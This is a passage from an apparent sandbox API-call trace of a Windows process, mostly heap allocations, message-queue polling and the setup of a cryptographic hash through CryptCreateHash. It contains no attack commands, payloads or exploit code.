(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0128.938] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.938] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0128.938] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.938] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.938] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.938] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.938] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.938] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.939] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.939] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.939] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0128.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0128.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.939] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0128.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0128.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0128.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0128.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0128.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0128.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.942] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0128.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.943] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0128.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.943] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.943] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0128.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0128.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.944] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0128.944] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.944] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0128.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0128.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0128.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.945] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0128.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0128.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0128.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0128.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0128.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0128.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0128.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0128.945] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0128.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0128.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0128.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0128.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 